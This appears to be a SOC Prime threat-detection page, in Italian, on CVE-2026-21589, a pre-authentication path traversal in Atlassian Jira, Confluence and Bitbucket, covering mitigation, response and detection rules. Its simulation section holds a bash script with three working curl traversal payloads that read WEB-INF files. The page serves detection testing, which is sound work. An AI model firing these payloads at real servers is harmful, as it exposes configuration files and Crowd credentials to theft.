SOC Prime Bias: Critical

08 Oct 2026 06:26 UTC

CVE-2026-21589: Vulnerabilità di Lettura File Pre-Autenticazione in Atlassian Jira e Confluence

Author Photo
SOC Prime Team linkedin icon Segui
CVE-2026-21589: Vulnerabilità di Lettura File Pre-Autenticazione in Atlassian Jira e Confluence
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sommario

Una vulnerabilità critica di lettura arbitraria di file pre-autenticazione, CVE-2026-21589, influisce su diversi prodotti Atlassian, inclusi Jira, Confluence e Bitbucket. Gli aggressori possono sfruttare un difetto di traversal del percorso che coinvolge il :: delimitatore per accedere a file sensibili all’interno del webroot dell’applicazione. Un exploit riuscito può esporre le credenziali Atlassian Crowd in chiaro, potenzialmente permettendo un compromesso amministrativo del sistema di gestione delle identità.

Indagine

I ricercatori hanno analizzato la vulnerabilità nel atlassian-plugins-webresource JAR confrontando le release affette e quelle patchate. Hanno scoperto che una funzione specifica converte i doppi punti in barre oblique, rendendo possibile il traversal del percorso. Mirando a plugin di risorse selezionati con barre oblique finali, i ricercatori sono stati in grado di recuperare file sensibili come WEB-INF/web.xml and crowd.properties.

Mitigazione

Atlassian ha pubblicato avvisi di sicurezza e release corrette per tutti i prodotti interessati. Le organizzazioni dovrebbero aggiornare alle versioni patchate consigliate, come Bitbucket 10.5.1, Confluence 10.2.19 e Jira 11.3.12. L’implementazione di regole WAF capaci di rilevare pattern di traversal del percorso che coinvolgono doppi punti, caratteri codificati e richieste di risorse sospette può fornire protezione aggiuntiva.

Risposta

Quando vengono rilevati tentativi di traversal del percorso sospetti che coinvolgono :: negli URL, i responder agli incidenti dovrebbero immediatamente identificare e isolare l’istanza Atlassian mirata. Rivedere Atlassian Crowd per la creazione non autorizzata di account, escalation dei privilegi o altre attività anomale. Visionare le richieste mirate a WEB-INF risorse e ruotare eventuali credenziali potenzialmente esposte tramite file di configurazione come crowd.properties.

Flusso d’attacco

Stiamo ancora aggiornando questa parte.

Rilevamenti

Possibile utente Jira aggiunto agli amministratori (via webserver)

Team SOC Prime
07 ott 2026

Possibile utente Jira creato (via webserver)

Team SOC Prime
07 ott 2026

Potenziale tentativo di sfruttamento CVE-2026-21589 (Atlassian Jira, Confluence, BitBucket Lettura file arbitraria pre-autenticazione) (via webserver)

Team SOC Prime
07 ott 2026

Lettura arbitraria di file nei prodotti Atlassian tramite traversal del percorso [Webserver]

Regole AI SOC Prime
07 ott 2026

Esecuzione di simulazione

  • Narrare & Comandi d’attacco: L’attaccante sta conducendo una ricognizione contro una presunta istanza Atlassian. Sta utilizzando un pattern di exploit noto per CVE-2026-21589, che sfrutta una tecnica di bypass specifica usando doppi punti (::) per navigare nel file system tramite l’interfaccia web. L’obiettivo è esfiltrare web.xml per mappare la struttura interna dell’applicazione e potenzialmente ottenere credenziali per ulteriori movimenti laterali.

  • Script di test di regressione:

    #!/bin/bash
    # Script di simulazione per attivare la regola di rilevamento del traversal del percorso di Atlassian
    
    TARGET_URL="http://localhost"
    
    echo "[+] Avvio Simulazione: Traversal del percorso di Atlassian"
    
    echo "[*] Tentativo Payload 1: Traversal di Jira web.xml..."
    curl -s -I "$TARGET_URL/download/resources/jira.webresources:color-picker-popup/images/..::..::..::..::..:WEB-INF::web.xml"
    
    echo "[*] Tentativo Payload 2: Traversal di Confluence web.xml..."
    curl -s -I "$TARGET_URL/s/1/_/download/resources/com.atlassian.confluence.plugins.dashboard-actions/images/..::..::..::..::..::..::..:WEB-INF::web.xml"
    
    echo "[*] Tentativo Payload 3: Traversal di Bitbucket urlrewrite.xml..."
    curl -s -I "$TARGET_URL/s/1.0/_/download/resources/com.atlassian.bitbucket.server.bitbucket-webpack-INTERNAL:avatar/avatar/..::..::..::..::..:WEB-INF::urlrewrite.xml"
    
    echo "[+] Simulazione Completa. Verificare gli avvisi nel SIEM."
  • Comandi di ripristino:

    # Non sono state apportate modifiche persistenti al sistema; nessun ripristino richiesto.
    echo "[+] Nessun ripristino necessario. La simulazione era non distruttiva."